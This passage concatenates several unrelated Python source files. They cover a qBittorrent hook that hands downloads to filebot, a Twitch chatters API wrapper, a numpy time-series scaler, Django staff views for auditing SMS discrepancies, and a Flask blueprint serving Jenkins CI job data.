    # read asynchronously proc.stdout, then proc.stderr.
    # NOTE(review): draining stdout fully before stderr can deadlock if the
    # child fills the stderr pipe first — acceptable for short filebot runs,
    # but worth confirming.
    async for line in proc.stdout:
        logger.info(f'[stdout] {line.decode().rstrip()}')
    async for line in proc.stderr:
        logger.info(f'[stderr] {line.decode().rstrip()}')
    # Wait for the subprocess exit.
    return await proc.wait()
def main():
    """qBittorrent post-processing hook: log the torrent metadata and hand
    the download off to filebot's AMC script."""
    scripts = os.getenv("SCRIPTS", default="/scripts")
    ppr_log = os.getenv("PPR_LOG", default="/config/postprocess.log")
    out_dir = os.getenv("OUT_DIR", default=os.getcwd())
    media_out = os.path.join(out_dir, "Media")
    fb_exec = shutil.which("filebot") or os.getenv("FILEBOT", default="/usr/bin/filebot")

    # basicConfig lives on the logging module, not on Logger instances
    # (the original called log.basicConfig, which does not exist).
    logging.basicConfig(
        format="{asctime:15} [{name}] - {levelname} - {message}",
        datefmt="%Y-%m-%d %H:%M:%S",
        style='{')
    log = logging.getLogger('qbittorrent.postprocess')
    log.addHandler(logging.FileHandler(f"{ppr_log}.log"))

    parser = argparse.ArgumentParser()
    parser.add_argument("-G", "--qb-tags", help="torrent tags separated by comma")
    parser.add_argument("-Z", "--qb-size", type=int, help="torrent size in bytes")
    parser.add_argument("-T", "--qb-tracker", help="current tracker")
    req = parser.add_argument_group('required arguments')
    req.add_argument("-N", "--qb-name", help="torrent name", required=True)
    req.add_argument("-L", "--qb-category", help="torrent category", required=True)
    req.add_argument("-F", "--qb-content", help="content path, same as root for multifile torrent", required=True)
    req.add_argument("-R", "--qb-root", help="root path, first torrent subdirectory path", required=True)
    # Help text fixed: -D carries the save path, not the tags (copy-paste).
    req.add_argument("-D", "--qb-save", help="torrent save path", required=True)
    req.add_argument("-C", "--qb-num", type=int, help="number of files", required=True)
    req.add_argument("-I", "--qb-hash", help="torrent info hash", required=True)
    args = parser.parse_args()

    log.info('-' * 50)
    log.info('--- RUN {} ---'.format(datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")))
    log.info('Value of SCRIPTS:\t\t{}'.format(scripts))
    log.info('Value of OUT_DIR:\t\t{}'.format(out_dir))
    log.info('Value of FILEBOT:\t\t{}'.format(fb_exec))
    log.info('Value of --qb-name:\t\t{}'.format(args.qb_name))
    log.info('Value of --qb-category\t\t{}'.format(args.qb_category))
    log.info('Value of --qb-tags\t\t{}'.format(args.qb_tags))
    log.info('Value of --qb-root\t\t{}'.format(args.qb_root))
    log.info('Value of --qb-save\t\t{}'.format(args.qb_save))
    log.info('Value of --qb-num\t\t{}'.format(args.qb_num))
    log.info('Value of --qb-size\t\t{}'.format(args.qb_size))
    log.info('Value of --qb-hash\t\t{}'.format(args.qb_hash))

    # 'multi' for multi-file torrents, 'single' otherwise.  Must be computed
    # BEFORE it is interpolated into the command line; the original defined
    # it afterwards, with invalid C-style ternary syntax.
    qb_multi = 'multi' if args.qb_num > 1 else 'single'

    cmd = [fb_exec, '-script', 'fn:amc', '--action', 'keeplink',
           '--output', media_out, '--conflict', 'skip', '-non-strict',
           # Comma added: the original fused '--filter' with its value via
           # implicit string concatenation.
           '--filter', "'!readLines(\"{}\").contains(n)'".format(os.path.join(scripts, 'excludes.txt')),
           '--log-file', 'amc.log', '--def', 'excludelist=".excludes"',
           'ut_dir={}'.format(args.qb_root), 'ut_kind={}'.format(qb_multi),
           'ut_title={}'.format(args.qb_name), 'ut_label={}'.format(args.qb_category),
           '@{}'.format(os.path.join(scripts, 'notify.txt')),
           '@{}'.format(os.path.join(scripts, 'movieFormat.groovy')),
           '@{}'.format(os.path.join(scripts, 'seriesFormat.groovy')),
           '@{}'.format(os.path.join(scripts, 'animeFormat.groovy'))]

    ret = asyncio.run(fb(cmd))
    log.info(f'{cmd!r} exited with {ret}')
# Script entry point (invoked by qBittorrent's "run external program" hook).
if __name__ == '__main__':
    main()
|
11522171
|
from typing import Generator, List
import twitch.tmi as tmi
from twitch.api import API
from twitch.baseresource import BaseResource
class Chatters(BaseResource['tmi.Chatter']):
    """Snapshot of the chatters currently connected to a channel's chat,
    grouped by role (broadcaster, vips, moderators, ...)."""

    def __init__(self, api: API, user: str):
        super().__init__(api=api, path='group/user/{user}/chatters')
        self._api = api
        # API return data
        self._data = self._api.get(self._path.format(user=user))

        chatters = self._data.get('chatters', {})

        def group(key: str, role: str) -> List['tmi.Chatter']:
            # Wrap each login name of one response group as a Chatter
            # carrying its role (factored out of seven copy-pasted
            # comprehensions).
            return [tmi.Chatter(self._api, name, role) for name in chatters.get(key, [])]

        # API Data
        self.count: int = self._data.get('chatter_count', -1)
        self.types: List[str] = list(chatters.keys())
        self.broadcaster: List[tmi.Chatter] = group('broadcaster', 'broadcaster')
        self.vips: List[tmi.Chatter] = group('vips', 'vip')
        self.moderators: List[tmi.Chatter] = group('moderators', 'moderator')
        self.staff: List[tmi.Chatter] = group('staff', 'staff')
        self.admins: List[tmi.Chatter] = group('admins', 'admin')
        self.global_mods: List[tmi.Chatter] = group('global_mods', 'global_mod')
        self.viewers: List[tmi.Chatter] = group('viewers', 'viewer')

    def all(self) -> List[tmi.Chatter]:
        """
        Get all chatters from all groups
        :return: List of all chatters
        """
        return self.broadcaster + self.vips + self.moderators + self.staff + self.admins + self.global_mods + self.viewers

    def __iter__(self) -> Generator['tmi.Chatter', None, None]:
        """
        Iterate over all chatters
        :return: Yield chatter
        """
        for chatter in self.all():
            yield chatter

    def __getitem__(self, index: int) -> 'tmi.Chatter':
        """
        Get chatter by index
        :param index: Index
        :return: Chatter
        """
        return self.all()[index]
|
11522198
|
import numpy as np
import pickle
# Custom scaler to easily normalize features along the time axis.
# Custom scaler to easily normalize features along the time axis.
class InputScaler():
    """Standardize features X (per-feature over axes 0 and 1) and targets T.

    X is expected to be a 3-D array whose last axis indexes features
    (assumes shape like (samples, time, features) — TODO confirm with caller).
    """

    def __init__(self):
        self.X_means = list()  # per-feature means, filled by fit()
        self.X_stds = list()   # per-feature stds, filled by fit()
        self.T_mean = 0
        self.T_std = 0

    def fit(self, X, T):
        """Compute per-feature statistics of X and global statistics of T."""
        # Reset so a repeated fit() does not append to stale statistics
        # (the original accumulated across calls).
        self.X_means = []
        self.X_stds = []
        for f in range(X.shape[2]):
            self.X_means.append(np.mean(X[:, :, f]))
            self.X_stds.append(np.std(X[:, :, f]))
        self.T_mean = np.mean(T)
        self.T_std = np.std(T)

    def transform(self, X, T):
        """Standardize X (in place) and T using fitted statistics.

        Returns:
            (X, T): the normalized arrays.  Note: X is modified in place.
        """
        for f in range(X.shape[2]):
            # Clip std away from zero to avoid division blow-ups.
            X[:, :, f] = (X[:, :, f] - self.X_means[f]) / \
                np.clip(self.X_stds[f], 1e-6, None)
        T = (T - self.T_mean) / np.clip(self.T_std, 1e-6, None)
        return X, T

    def dump(self, path):
        """Pickle this scaler to *path* (file handle closed deterministically;
        the original leaked it)."""
        with open(path, 'wb') as fh:
            pickle.dump(self, fh)

    @staticmethod
    def load(path):
        """Load a pickled scaler from *path*."""
        with open(path, 'rb') as fh:
            return pickle.load(fh)
|
11522203
|
from bread.bread import LabelValueReadView, EditView
from django import forms
from django.contrib import messages
from django.utils.translation import ungettext, ugettext_lazy as _
from django_filters import FilterSet
from audit.models import Discrepancy, VumiLog, SMSTrail
from libya_elections.libya_bread import PaginatedBrowseView, SoftDeleteBread, StaffBreadMixin
from libya_elections.utils import get_verbose_name
class DiscrepancyFilterSet(FilterSet):
    """Filter set for the browse view: narrows discrepancies by ``resolved``."""
    class Meta:
        model = Discrepancy
        fields = ['resolved', ]
class DiscrepanciesBrowse(PaginatedBrowseView):
    """Paginated listing of SMS audit discrepancies.

    Defaults the ``resolved`` filter to "unresolved" and decorates the
    page with messages summarizing how many messages were audited and
    how many unresolved discrepancies exist.
    """
    columns = [
        (get_verbose_name(Discrepancy, 'creation_date'), 'formatted_creation_date',
         'creation_date'),
        (_("Direction"), 'get_direction_display'),
        (_("From"), 'get_from'),
        (_("To"), 'get_to'),
        (get_verbose_name(Discrepancy, 'resolved'), 'resolved'),
    ]
    filterset = DiscrepancyFilterSet
    search_fields = [
        'trail__sms__from_number', 'trail__sms__to_number', 'trail__sms__message',
        'trail__vumi__from_addr', 'trail__vumi__to_addr', 'trail__vumi__content',
    ]
    search_terms = _("source number, destination number, or message")

    def get(self, request, *args, **kwargs):
        # When no explicit filter is supplied, default to unresolved only.
        if 'resolved' not in request.GET:
            request.GET = request.GET.copy()  # make editable
            request.GET['resolved'] = '3'  # choices are 1=any, 2=True, 3=False
        response = super(DiscrepanciesBrowse, self).get(request, *args, **kwargs)
        total_audited = SMSTrail.objects.count()
        messages.info(request, ungettext(
            '%(count)d message was audited.',
            '%(count)d messages were audited.',
            total_audited
        ) % {'count': total_audited})
        unresolved = Discrepancy.objects.filter(resolved=False).count()
        if unresolved:
            messages.error(request, ungettext(
                'There was %(count)d discrepancy found.',
                'There were %(count)d discrepancies found.',
                unresolved
            ) % {'count': unresolved})
        return response

    def get_queryset(self):
        # Pull the related trail rows in the same query to avoid N+1 lookups.
        base = super(DiscrepanciesBrowse, self).get_queryset()
        return base.select_related('trail', 'trail__sms', 'trail__vumi')
def get_direction(ctx):
    """Human-readable direction label for the context object's vumi trail."""
    direction_labels = dict(VumiLog.DIRECTION_CHOICES)
    return direction_labels[ctx['object'].trail.direction]
def get_datetime(ctx):
    """Timestamp of the SMS trail attached to the object in context."""
    obj = ctx['object']
    return obj.trail.datetime
class DiscrepanciesRead(LabelValueReadView):
    """Detail view of one discrepancy, pairing labels with field values."""
    fields = [
        (_("Direction"), get_direction),
        (_("Message in registration system"), 'sms_as_html'),
        (_("Message to/from the mobile network operator"), 'vumilog_as_html'),
        (None, 'comments'),
        (None, 'resolved'),
        (get_verbose_name(Discrepancy, 'creation_date'),
         'formatted_creation_date'),
        (get_verbose_name(Discrepancy, 'modification_date'),
         'formatted_modification_date'),
    ]
class DiscrepancyForm(forms.ModelForm):
    """Edit form exposing only the reviewer-editable discrepancy fields."""
    class Meta:
        model = Discrepancy
        fields = ['comments', 'resolved']
class DiscrepanciesEdit(EditView):
    """Edit view backed by DiscrepancyForm (comments/resolved only)."""
    form_class = DiscrepancyForm
class DiscrepanciesBread(StaffBreadMixin, SoftDeleteBread):
    """Staff-only bread configuration wiring the discrepancy views together."""
    browse_view = DiscrepanciesBrowse
    edit_view = DiscrepanciesEdit
    model = Discrepancy
    read_view = DiscrepanciesRead
    plural_name = "discrepancies"
    views = 'BRE'  # Browse, Read, Edit -- no add or delete
class VumiLogRead(LabelValueReadView):
    """Read-only detail view of a single Vumi log entry."""
    fields = [
        (get_verbose_name(VumiLog, 'from_addr'), 'from_number_formatted_tag'),
        (get_verbose_name(VumiLog, 'direction'), 'get_direction_display'),
        (get_verbose_name(VumiLog, 'to_addr'), 'to_number_formatted_tag'),
        (None, 'content'),
        (get_verbose_name(VumiLog, 'creation_date'), 'formatted_creation_date'),
        (get_verbose_name(VumiLog, 'modification_date'), 'formatted_modification_date'),
    ]

    def get_context_data(self, **kwargs):
        """Add a back_url so we can link back to the associated discrepancy"""
        context = super(VumiLogRead, self).get_context_data(**kwargs)
        vumi_log = self.get_object()
        context['back_url'] = vumi_log.smstrail.discrepancy.get_absolute_url()
        return context
class VumiLogsBread(StaffBreadMixin, SoftDeleteBread):
    """Staff-only, read-only bread configuration for Vumi logs."""
    model = VumiLog
    read_view = VumiLogRead
    views = 'R'  # read-only
|
11522230
|
import json
from flask import Blueprint, request
from apps.extention.business.cidata import CiDataBusiness, CiJobBusiness
from apps.extention.extentions import parse_list_args2, parse_json_form, validation
from apps.public.models.public import Config
from library.api.render import json_detail_render, json_list_render2
cidata = Blueprint('cidata', __name__)
@cidata.route('/', methods=['GET'])
def ci_list():
    """
    @api {get} /v1/cidata/ 获取jenkins的job
    @apiName GetJenkinsJob
    @apiGroup CI
    @apiDescription 查询jenkins的job
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "accuracy": "0",
                "case_count": 0,
                "description": "自动化例会通知",
                "id": 15,
                "name": "automation_meeting",
                "nextBuildNumber": 63,
                "status": 0
            }
        ],
        "message": "ok"
    }
    """
    # Fetch every Jenkins job record and wrap it in the standard envelope.
    jobs = CiDataBusiness.query_all_json()
    return json_detail_render(0, jobs)
@cidata.route('/job/<int:ci_id>', methods=['get'])
def job_list(ci_id):
    """
    @api {get} /v1/cidata/job/:ci_id 获取某个job的数据
    @apiName GetJenkinsJobData
    @apiGroup CI
    @apiDescription 获取某个job的数据
    @apiParam {int} ci_id job id
    @apiParam {int} page_size 当前页面的数量
    @apiParam {int} page_index 当前页面的页数
    @apiParam {string} start_time 开始日期
    @apiParam {string} end_time 结束日期
    @apiParam {string} start_name 触发者
    @apiParamExample {json} Request-Example:
    {
        "ci_id": 1,
        "page_size":10,
        "page_index":1,
        "start_time":"2019-04-27",
        "end_time":"2019-07-26",
        "start_name":""
    }
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "ci_id": 16,
                "id": 3547,
                "job_accuracy": "0.7814",
                "job_count": 883,
                "number": 135,
                "report": "http://host:port/report.html",
                "run_date": "Tue, 23 Jul 2019 12:48:00 GMT",
                "run_time": "3232.939",
                "start_name": "timer",
                "status": 0,
                "url": "http://ci.tcloud.com/job/tcloud_activity_api/135/"
            }
        ],
        "message": "ok",
        "page_index": 1,
        "page_size": 10,
        "total": 1
    }
    """
    # Pagination parameters come from the query string.
    page_size, page_index = parse_list_args2()
    builds = CiJobBusiness.query_json_by_id(ci_id, page_size, page_index)
    total = CiJobBusiness.query_count(ci_id)
    return json_list_render2(0, builds, page_size, page_index, total)
@cidata.route('/description/<int:ci_id>', methods=['get'])
def description_list(ci_id):
    """
    @api {get} /v1/description/:ci_id 获取job的描述
    @apiName GetJenkinsJobDescription
    @apiGroup CI
    @apiDescription 获取job的描述
    @apiParam {int} ci_id job id
    @apiParamExample {json} Request-Example:
    {
        "ci_id": 1,
    }
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "error_count": 1,
                "error_message": "['oom:\\n', '// OOM: com.tcloud(dump time: 2019-07-03 12:13:56)]",
                "error_type": "OOM",
                "id": 5,
                "monkey_id": 29
            }
        ],
        "message": "ok"
    }
    """
    # Look up the description records associated with this job id.
    descriptions = CiDataBusiness.query_description_by_id(ci_id)
    return json_detail_render(0, descriptions)
# @cidata.route('/updatedata', methods=['get'])
# def update_data():
#     # Disabled: Jenkins data is now refreshed once a day by an internal job.
#     CiJobBusiness.update_jenkins_data()
#     return json_detail_render(0, [])
@cidata.route('/run', methods=['POST'])
@validation('POST:cidatarunandreport')
def run_project():
    """
    @api {post} /v1/cidata/run 触发job
    @apiName runJob
    @apiGroup CI
    @apiDescription 触发job
    @apiParam {list} run_list 触发的list
    @apiParam {int} project_id 项目id
    @apiParamExample {json} Request-Example:
    {
        "run_list": [1],
        "project_id":1
    }
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "id": 1,
                "isexcuting": false,
                "job": "test_email",
                "name": "<NAME>"
            }
        ],
        "message": "ok"
    }
    """
    # Validated payload: the project and the list of jobs to trigger.
    project_id, run_list = parse_json_form('cidatarunandreport')
    result_code, result_data, result_message = CiJobBusiness.run(project_id, run_list)
    return json_detail_render(result_code, result_data, result_message)
@cidata.route('/report', methods=['POST'])
@validation('POST:cidatarunandreport')
def gain_report():
    """
    @api {post} /v1/cidata/report 获取报告
    @apiName gainJobReport
    @apiGroup CI
    @apiDescription job的报告
    @apiParam {list} run_list 触发的list
    @apiParam {int} project_id 项目id
    @apiParamExample {json} Request-Example:
    {
        "run_list": [1],
        "project_id":1
    }
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "id": 1,
                "isexcuting": false,
                "job": "tcloud_regression_test",
                "name": "Tcloud回归测试",
                "url": "http://host:port/report.html"
            }
        ],
        "message": "ok"
    }
    """
    # Validated payload: the project and the list of jobs to report on.
    project_id, run_list = parse_json_form('cidatarunandreport')
    result_code, result_data, result_message = CiJobBusiness.gain_report(project_id, run_list)
    return json_detail_render(result_code, result_data, result_message)
@cidata.route('/config/info', methods=['POST'])
@validation('POST:configinfo')
def gain_config_info():
    """
    @api {post} /v1/cidata/config/info ci配置数据的获取
    @apiName GainCIConfigData
    @apiGroup CI
    @apiDescription ci配置数据的获取
    @apiParam {int} project_id 项目id
    @apiParamExample {json} Request-Example:
    {
        "project_id":1
    }
    @apiSuccessExample {json} Success-Response:
    HTTP/1.1 200 OK
    {
        "code": 0,
        "data": [
            {
                "id": 1,
                "job": "tcloud_regression_test",
                "name": "Tcloud回归测试"
            }
        ],
        "message": "ok"
    }
    """
    data = []
    project_id = parse_json_form('configinfo')[0]
    jenkins_config = Config.query.add_columns(Config.content.label('content')).filter(
        Config.module == 'jenkins',
        Config.module_type == 1).first()
    # Guard against a missing jenkins config row: previously this raised
    # AttributeError on `.content`; an absent config now yields empty data.
    if jenkins_config is not None:
        run_dict = json.loads(jenkins_config.content)
        # Config keys are stringified project ids; fall back to [] if absent.
        data = run_dict.get(str(project_id), [])
    return json_detail_render(0, data)
@cidata.route('/rundict', methods=['GET'])
def get_run_dict():
    """Return the run dict and run-name dict for the ``projectid`` query arg."""
    project_id = request.args.get('projectid')
    run_dict, run_name_dict = CiJobBusiness.gain_run_dict(project_id)
    payload = {'run_dict': run_dict, 'run_name_dict': run_name_dict}
    return json_detail_render(0, payload)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.